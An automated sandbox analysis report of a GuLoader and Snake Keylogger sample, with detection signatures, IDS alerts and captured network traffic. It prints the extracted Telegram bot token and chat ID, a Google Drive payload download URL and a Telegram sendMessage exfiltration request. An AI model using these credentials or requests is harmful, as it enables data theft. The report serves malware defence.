Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NDCNDvC27F.exe

Overview

General Information

Sample name:NDCNDvC27F.exe
renamed because original name is a hash value
Original sample name:f244e767138599c4a0c605431d2be543d45da2adfb9ce4a2dcb499704febf381.exe
Analysis ID:1632239
MD5:429e48d78bf4bf8403c99c46e6514840
SHA1:378bad9d0c769087eee0159da95bf216b1ed7f56
SHA256:f244e767138599c4a0c605431d2be543d45da2adfb9ce4a2dcb499704febf381
Tags:exenjratsigneduser-adrian__luca
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious PE digital signature
Joe Sandbox ML detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • NDCNDvC27F.exe (PID: 7644 cmdline: "C:\Users\user\Desktop\NDCNDvC27F.exe" MD5: 429E48D78BF4BF8403C99C46E6514840)
    • NDCNDvC27F.exe (PID: 1372 cmdline: "C:\Users\user\Desktop\NDCNDvC27F.exe" MD5: 429E48D78BF4BF8403C99C46E6514840)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Token": "8099931947:AAE1ESweRA82yXTxOE-G8GWsPBJDgGqE32Y", "Chat_id": "5898096617\n", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
0000000A.00000002.3080268352.0000000033FC6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000A.00000002.3080268352.0000000033EE1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000000.00000002.2042730966.000000000482F000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: NDCNDvC27F.exe PID: 1372JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: NDCNDvC27F.exe PID: 1372JoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T21:32:23.276467+010028033053Unknown Traffic192.168.2.449725104.21.32.1443TCP
            2025-03-07T21:32:25.726139+010028033053Unknown Traffic192.168.2.449726104.21.32.1443TCP
            2025-03-07T21:32:28.795335+010028033053Unknown Traffic192.168.2.449727104.21.32.1443TCP
            2025-03-07T21:32:32.096555+010028033053Unknown Traffic192.168.2.449728104.21.32.1443TCP
            2025-03-07T21:32:35.757791+010028033053Unknown Traffic192.168.2.449729104.21.32.1443TCP
            2025-03-07T21:32:42.953288+010028033053Unknown Traffic192.168.2.449730104.21.32.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T21:32:13.189354+010028032742Potentially Bad Traffic192.168.2.449723132.226.8.16980TCP
            2025-03-07T21:32:15.689601+010028032742Potentially Bad Traffic192.168.2.449723132.226.8.16980TCP
            2025-03-07T21:32:21.059560+010028032742Potentially Bad Traffic192.168.2.449723132.226.8.16980TCP
            2025-03-07T21:32:23.611422+010028032742Potentially Bad Traffic192.168.2.449723132.226.8.16980TCP
            2025-03-07T21:32:26.595901+010028032742Potentially Bad Traffic192.168.2.449723132.226.8.16980TCP
            2025-03-07T21:32:29.908329+010028032742Potentially Bad Traffic192.168.2.449723132.226.8.16980TCP
            2025-03-07T21:32:33.557928+010028032742Potentially Bad Traffic192.168.2.449723132.226.8.16980TCP
            2025-03-07T21:32:38.040923+010028032742Potentially Bad Traffic192.168.2.449723132.226.8.16980TCP
            2025-03-07T21:32:40.611522+010028032742Potentially Bad Traffic192.168.2.449723132.226.8.16980TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T21:32:03.099512+010028032702Potentially Bad Traffic192.168.2.449721142.250.185.142443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T21:32:45.656606+010018100071Potentially Bad Traffic192.168.2.449731149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 0000000A.00000002.3080268352.0000000033EE1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "8099931947:AAE1ESweRA82yXTxOE-G8GWsPBJDgGqE32Y", "Chat_id": "5898096617\n", "Version": "4.4"}
            Source: NDCNDvC27F.exeVirustotal: Detection: 66%Perma Link
            Source: NDCNDvC27F.exeReversingLabs: Detection: 57%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36DF86C4 CryptUnprotectData,10_2_36DF86C4
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36DF8EF7 CryptUnprotectData,10_2_36DF8EF7
            Source: NDCNDvC27F.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49724 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.4:49721 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:49722 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeDirectory queried: number of queries: 1001
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 0_2_00402706 FindFirstFileW,0_2_00402706
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 0_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405731
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 0_2_004061E5 FindFirstFileW,FindClose,0_2_004061E5
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_00402706 FindFirstFileW,10_2_00402706
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,10_2_00405731
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_004061E5 FindFirstFileW,FindClose,10_2_004061E5
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 0360F2EDh10_2_0360F33C
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 0360F2EDh10_2_0360F15B
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 0360FAA9h10_2_0360F804
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36202D49h10_2_36202A98
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36203310h10_2_36202EF8
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36200D0Dh10_2_36200B30
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 362016F8h10_2_36200B30
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 3620ECE1h10_2_3620EA38
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36203310h10_2_3620323E
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h10_2_36200673
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 3620F139h10_2_3620EE90
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 3620F591h10_2_3620F2E8
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36203310h10_2_36202EF3
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 3620F9E9h10_2_3620F740
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 3620FE41h10_2_3620FB98
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 3620D2D1h10_2_3620D028
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h10_2_36200040
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h10_2_36200853
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 3620D729h10_2_3620D480
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 3620DB81h10_2_3620D8D8
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 3620DFD9h10_2_3620DD30
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 3620E431h10_2_3620E188
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 3620E889h10_2_3620E5E0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DF9A8Fh10_2_36DF97C0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DF9280h10_2_36DF8FB0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DF7EB5h10_2_36DF7B78
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DFC39Fh10_2_36DFC0D0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DF5179h10_2_36DF4ED0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DF7571h10_2_36DF72C8
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DFE38Fh10_2_36DFE0C0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DF0B99h10_2_36DF08F0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DFA3AFh10_2_36DFA0E0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DF0741h10_2_36DF0498
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DFB15Fh10_2_36DFAE90
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DF6733h10_2_36DF6488
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DFD14Fh10_2_36DFCE80
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DF2151h10_2_36DF1EA8
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DF9F1Fh10_2_36DF9C50
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DF1CF9h10_2_36DF1A50
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DFBF0Fh10_2_36DFBC40
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DF02E9h10_2_36DF0040
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DF4D21h10_2_36DF4A78
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DFF13Fh10_2_36DFEE70
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DF7119h10_2_36DF6E70
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DF3709h10_2_36DF3460
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DF6CC1h10_2_36DF6A18
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DF32B1h10_2_36DF3008
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DFACCFh10_2_36DFAA00
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DF62D9h10_2_36DF6030
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DFDEFFh10_2_36DFDC30
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DF48C9h10_2_36DF4620
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DF5E81h10_2_36DF5BD8
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DF18A1h10_2_36DF15F8
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DFCCBFh10_2_36DFC9F0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DFECAFh10_2_36DFE9E0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DFFA5Fh10_2_36DFF790
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DF5A29h10_2_36DF5780
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DF2E59h10_2_36DF2BB0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DFBA7Fh10_2_36DFB7B0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DF1449h10_2_36DF11A0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DFDA6Fh10_2_36DFD7A0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DF2A01h10_2_36DF2758
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DFE81Fh10_2_36DFE550
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DF0FF1h10_2_36DF0D48
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DFA83Fh10_2_36DFA570
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DFC82Fh10_2_36DFC560
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DFD5DFh10_2_36DFD310
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DFF5CFh10_2_36DFF300
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DF25A9h10_2_36DF2300
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DF55D1h10_2_36DF5328
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DFB5EFh10_2_36DFB320
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36DF79C9h10_2_36DF7720
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E657A8h10_2_36E654B0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E6F570h10_2_36E6F278
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E64E18h10_2_36E64B20
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E6C0D8h10_2_36E6BDE0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E642B7h10_2_36E63FE8
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E652E0h10_2_36E64FE8
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E6EBE1h10_2_36E6E8E8
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E67DE8h10_2_36E67AF0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E622C7h10_2_36E61FF8
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E6A8F0h10_2_36E6A5F8
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E6ADB8h10_2_36E6AAC0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E63997h10_2_36E636C8
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E6D8C0h10_2_36E6D5C8
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E66AC8h10_2_36E667D0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E619A7h10_2_36E616D8
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E695D0h10_2_36E692D8
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E69A98h10_2_36E697A0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E63078h10_2_36E62DA8
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E6C5A0h10_2_36E6C2A8
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E6F0A8h10_2_36E6EDB0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E61087h10_2_36E60DB8
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E682B0h10_2_36E67FB8
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E68778h10_2_36E68480
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E62757h10_2_36E62488
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E6B280h10_2_36E6AF88
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E6DD88h10_2_36E6DA90
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E60767h10_2_36E60498
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E66F90h10_2_36E66C98
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E67458h10_2_36E67160
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E61E37h10_2_36E61B68
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E69F60h10_2_36E69C68
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E6CA68h10_2_36E6C770
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E647E8h10_2_36E64478
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E65C70h10_2_36E65978
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E602E7h10_2_36E60040
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E66138h10_2_36E65E40
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E6FA38h10_2_36E6F740
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E61517h10_2_36E61248
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E68C40h10_2_36E68948
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E6B748h10_2_36E6B450
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E63E27h10_2_36E63B58
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E6E250h10_2_36E6DF58
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E6E718h10_2_36E6E420
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E60BF7h10_2_36E60928
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E67920h10_2_36E67628
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E6A428h10_2_36E6A130
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E63507h10_2_36E63238
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E6CF30h10_2_36E6CC38
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E6D3F8h10_2_36E6D100
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E66600h10_2_36E66308
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E69108h10_2_36E68E10
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E62BE7h10_2_36E62918
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E6BC10h10_2_36E6B918
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_36E8EF2D
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_36E8EF08
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E90800h10_2_36E90508
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then jmp 36E90338h10_2_36E90040
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_36EC2A80
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_36EC2A70

            Networking

            barindex
            Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49731 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2007/03/2025%20/%2015:32:36%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49723 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49729 -> 104.21.32.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49725 -> 104.21.32.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49727 -> 104.21.32.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49728 -> 104.21.32.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49726 -> 104.21.32.1:443
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49721 -> 142.250.185.142:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49730 -> 104.21.32.1:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_D8Pml6lMbIdvZPiehCG8Phc9LzH2U_A HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1_D8Pml6lMbIdvZPiehCG8Phc9LzH2U_A&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
